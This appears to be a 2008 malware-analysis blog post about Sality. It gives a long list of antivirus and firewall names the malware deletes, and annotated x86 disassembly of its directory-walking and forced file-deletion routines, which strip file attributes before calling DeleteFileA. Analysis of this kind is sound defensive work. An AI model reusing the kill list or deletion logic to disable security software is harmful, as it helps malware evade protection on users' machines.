Wednesday, September 24, 2008

Sality ....

List of the predefined security-software file names that it deletes ...


Well, aside from the *.vdb and *.avc signature files ...



  • A2GUARD.
    AAVSHIELD.
    ADVCHK.
    AHNSD.
    AIRDEFENSE
    ALERTSVC
    ALOGSERV
    ALSVC.
    AMON.
    ANTI-TROJAN.
    ANTIVIR
    APVXDWIN.
    ARMOR2NET.
    ASHAVAST.
    ASHDISP.
    ASHENHCD.
    ASHMAISV.
    ASHPOPWZ.
    ASHSERV.
    ASHSIMPL.
    ASHSKPCK.
    ASHWEBSV.
    ASWUPDSV.
    ATCON.
    ATUPDATER.
    ATWATCH.
    AVAST
    AVAST
    AVAST
    AVCENTER.
    AVCIMAN.
    AVCONSOL.
    AVENGINE.
    AVESVC.
    AVGAMSVR.
    AVGCC.
    AVGCC32.
    AVGCTRL.
    AVGEMC.
    AVGFWSRV.
    AVGNT
    AVGNT.
    AVGNTDD
    AVGNTMGR
    AVGSERV.
    AVGUARD.
    AVGUPSVC.
    AVINITNT.
    AVKSERV.
    AVKSERVICE.
    AVKWCTL.
    AVP32.
    AVPCC.
    AVPM.
    AVSCHED32.
    AVSERVER.
    AVSYNMGR.
    AVWUPD32.
    AVWUPSRV.
    AVXMONITOR9X.
    AVXMONITORNT.
    AVXQUAR.
    BDMCON.
    BDNEWS.
    BDSUBMIT.
    BDSWITCH.
    BLACKD.
    BLACKICE.
    CAFIX.
    CCAPP.
    CCEVTMGR.
    CCPROXY.
    CCSETMGR.
    CFIAUDIT.
    CLAMTRAY.
    CLAMWIN.
    CLAW95.
    CUREIT
    CUREIT
    DEFWATCH.
    DRVIRUS.
    DRWADINS.
    DRWEB32W.
    DRWEBSCD.
    DRWEBUPW.
    DWEBIO
    DWEBLLIO
    EKRN.
    ESCANH95.
    ESCANHNT.
    EWIDOCTRL.
    EZANTIVIRUSREGISTRATIONCHECK.
    F-AGNT95.
    F-PROT95.
    F-SCHED.
    F-STOPW.
    FAMEH32.
    FILEMON
    FIRESVC.
    FIRETRAY.
    FIREWALL.
    FPAVUPDM.
    FRESHCLAM.
    FSAV32.
    FSAVGUI.
    FSBWSYS.
    FSDFWD.
    FSGK32.
    FSGK32ST.
    FSGUIEXE.
    FSMA32.
    FSMB32.
    FSPEX.
    FSSM32.
    GCASDTSERV.
    GCASSERV.
    GIANTANTISPYWAREMAIN.
    GIANTANTISPYWAREUPDATER.
    GUARDGUI.
    GUARDNT.
    HREGMON.
    HRRES.
    HSOCKPE.
    HUPDATE.
    IAMAPP.
    IAMSERV.
    ICLOAD95.
    ICLOADNT.
    ICMON.
    ICSSUPPNT.
    ICSUPP95.
    ICSUPPNT.
    IFACE.
    INETUPD.
    INOCIT.
    INORPC.
    INORT.
    INOTASK.
    INOUPTNG.
    IOMON98.
    ISAFE.
    ISATRAY.
    ISRV95.
    ISSVC.
    KAVMM.
    KAVPF.
    KAVPFW.
    KAVSTART.
    KAVSVC.
    KAVSVCUI.
    KMAILMON.
    KPFWSVC.
    MCAGENT.
    MCMNHDLR.
    MCREGWIZ.
    MCUPDATE.
    MCVSSHLD.
    MINILOG.
    MYAGTSVC.
    MYAGTTRY.
    NAVAPSVC.
    NAVAPW32.
    NAVLU32.
    NAVW32.
    NEOWATCHLOG.
    NEOWATCHTRAY.
    NISSERV
    NISUM.
    NMAIN.
    NOD32
    NOD32
    NORMIST.
    NOTSTART.
    NPAVTRAY.
    NPFMNTOR.
    NPFMSG.
    NPROTECT.
    NSCHED32.
    NSMDTR.
    NSSSERV.
    NSSTRAY.
    NTOS.
    NTRTSCAN.
    NTXCONFIG.
    NUPGRADE.
    NVCOD.
    NVCTE.
    NVCUT.
    NWSERVICE.
    OFCPFWSVC.
    OP_MON.
    OUTPOST
    PAVFIRES.
    PAVFNSVR.
    PAVKRE.
    PAVPROT.
    PAVPROXY.
    PAVPRSRV.
    PAVSRV51.
    PAVSS.
    PCCGUIDE.
    PCCIOMON.
    PCCNTMON.
    PCCPFW.
    PCCTLCOM.
    PCTAV.
    PERSFW.
    PERTSK.
    PERVAC.
    PNMSRV.
    POP3TRAP.
    POPROXY.
    PREVSRV.
    PSIMSVC.
    QHM32.
    QHONLINE.
    QHONSVC.
    QHPF.
    QHWSCSVC.
    RAVMON.
    RAVTIMER.
    RFWMAIN.
    RTVSCAN.
    RTVSCN95.
    RULAUNCH.
    SAVADMINSERVICE.
    SAVMAIN.
    SAVPROGRESS.
    SAVSCAN.
    SCANNINGPROCESS.
    SDHELP.
    SHSTAT.
    SITECLI.
    SPBBCSVC.
    SPHINX.
    SPIDERCPL.
    SPIDERML.
    SPIDERNT.
    SPIDERUI.
    SPYBOTSD.
    SPYXX.
    SS3EDIT.
    STOPSIGNAV.
    SWAGENT.
    SWDOCTOR.
    SWNETSUP.
    SYMLCSVC.
    SYMPROXYSVC.
    SYMSPORT.
    SYMWSC.
    SYNMGR.
    TAUMON.
    TBMON.
    TFAK.
    THAV.
    THSM.
    TMAS.
    TMLISTEN.
    TMNTSRV.
    TMPFW.
    TMPROXY.
    TNBUTIL.
    TRJSCAN.
    UP2DATE.
    VBA32ECM.
    VBA32IFS.
    VBA32LDR.
    VBA32PP3.
    VBSNTW.
    VCHK.
    VCRMON.
    VETTRAY.
    VIRUSKEEPER.
    VPTRAY.
    VRFWSVC.
    VRMONNT.
    VRMONSVC.
    VRRW32.
    VSECOMR.
    VSHWIN32.
    VSMON.
    VSSERV.
    VSSTAT.
    WATCHDOG.
    WEBPROXY.
    WEBSCANX.
    WEBTRAP.
    WGFE95.
    WINAW32.
    WINROUTE.
    WINSS.
    WINSSNOTIFY.
    WRCTRL.
    XCOMMSVR.
    ZAUINST
    ZLCLIENT
    _AVPM.
    ZONEALARM






; --- Fragment of the directory-walk loop; the enclosing routine's start and end are not shown on this page. ---
; Per FindNextFileA hit: re-terminate the path buffer at [EBP-548], append the found name,
; compare the last 4 characters of the result (case-insensitively) with a global string
; pointed to by DS:[1054188], and on a match call the delete routine at 0103B79C with (path, 1).
; [EBP-118] is presumably the cFileName field of the WIN32_FIND_DATA used by FindNextFileA
; -- TODO confirm from the FindFirstFileA setup, which is outside this excerpt.
0103B94E CALL DWORD PTR DS:[105316C] ; kernel32.FindNextFileA   ; fetch the next directory entry
0103B954 TEST EAX,EAX
0103B956 JE 0103BA22                                              ; no more entries -> leave the loop
0103B95C MOV EDX,DWORD PTR SS:[EBP-54C]                          ; saved offset (presumably the directory-prefix length; verify)
0103B962 MOV BYTE PTR SS:[EBP+EDX-548],0                         ; NUL-terminate the buffer at that offset
0103B96A LEA EAX,DWORD PTR SS:[EBP-118]
0103B970 PUSH EAX
0103B971 LEA ECX,DWORD PTR SS:[EBP-548]
0103B977 PUSH ECX
0103B978 CALL DWORD PTR DS:[1053160] ; kernel32.lstrcatA         ; [EBP-548] += [EBP-118] (unbounded append)
0103B97E LEA EDX,DWORD PTR SS:[EBP-548]
0103B984 PUSH EDX
0103B985 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B98B SUB EAX,4
0103B98E MOV DWORD PTR SS:[EBP-4],EAX                            ; [EBP-4] = offset of the last 4 characters of the full path
0103B991 LEA EAX,DWORD PTR SS:[EBP-118]
0103B997 PUSH EAX
0103B998 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B99E CMP EAX,4
0103B9A1 JLE SHORT 0103B9D0                                       ; a name of 4 characters or fewer cannot carry a 4-char suffix -> skip
0103B9A3 MOV ECX,DWORD PTR DS:[1054188]                          ; global string pointer: the suffix being matched (its value is not shown here)
0103B9A9 PUSH ECX
0103B9AA MOV EDX,DWORD PTR SS:[EBP-4]
0103B9AD LEA EAX,DWORD PTR SS:[EBP+EDX-548]                      ; &path[len-4]
0103B9B4 PUSH EAX
0103B9B5 CALL DWORD PTR DS:[10530B4] ; kernel32.lstrcmpiA        ; case-insensitive suffix compare
0103B9BB TEST EAX,EAX
0103B9BD JNZ SHORT 0103B9D0                                       ; no match -> skip this entry
0103B9BF PUSH 1                                                   ; arg2 = 1: delete without the pre-check (see 0103B79C)
0103B9C1 LEA ECX,DWORD PTR SS:[EBP-548]
0103B9C7 PUSH ECX                                                 ; arg1 = full path
0103B9C8 CALL 0103B79C                                            ; delete routine (listed below)

--------------------------------------------------


; --- 0103B79C(path, flag): forced file deletion. ---
; arg1 [EBP+8] = path (char*), arg2 [EBP+C] = flag.
;   flag != 0 -> delete unconditionally.
;   flag == 0 -> first call 0103CAC0(path, 2, 0) (caller-cleaned args, body not on this page);
;                delete only if that call returns 0, otherwise return without touching the file.
; Before DeleteFileA the attributes are reset to 0x20 (FILE_ATTRIBUTE_ARCHIVE), which drops
; READONLY/HIDDEN/SYSTEM -- so a read-only attribute on the target does not protect it; only
; ACLs / a running self-protection driver would.  DeleteFileA's result is discarded and the
; routine always returns 0 in EAX.  Plain RETN: the caller cleans up the two arguments.
0103B79C PUSH EBP
0103B79D MOV EBP,ESP
0103B79F CMP DWORD PTR SS:[EBP+C],0                        ; flag == 0?
0103B7A3 JNZ SHORT 0103B7BD                                 ; flag != 0 -> straight to the delete path
0103B7A5 PUSH 0
0103B7A7 PUSH 2
0103B7A9 MOV EAX,DWORD PTR SS:[EBP+8]
0103B7AC PUSH EAX
0103B7AD CALL 0103CAC0                                      ; helper(path, 2, 0); semantics not visible on this page
0103B7B2 ADD ESP,0C                                         ; caller cleans 3 args
0103B7B5 TEST EAX,EAX
0103B7B7 JNZ SHORT 0103B7BB                                 ; helper returned non-zero -> skip deletion (via 0103B7D3)
0103B7B9 JMP SHORT 0103B7D7                                 ; helper returned zero -> delete (via 0103B7BD)
0103B7BB JMP SHORT 0103B7D3
0103B7BD PUSH 20                                            ; 0x20 = FILE_ATTRIBUTE_ARCHIVE: clears READONLY/HIDDEN/SYSTEM
0103B7BF MOV ECX,DWORD PTR SS:[EBP+8]
0103B7C2 PUSH ECX
0103B7C3 CALL DWORD PTR DS:[1053080] ; kernel32.SetFileAttributesA
0103B7C9 MOV EDX,DWORD PTR SS:[EBP+8]
0103B7CC PUSH EDX
0103B7CD CALL DWORD PTR DS:[105307C] ; kernel32.DeleteFileA   ; return value ignored
0103B7D3 XOR EAX,EAX                                        ; return 0 on every path
0103B7D5 JMP SHORT 0103B7D9
0103B7D7 JMP SHORT 0103B7BD                                 ; trampoline back to the delete path
0103B7D9 POP EBP
0103B7DA RETN


EOF
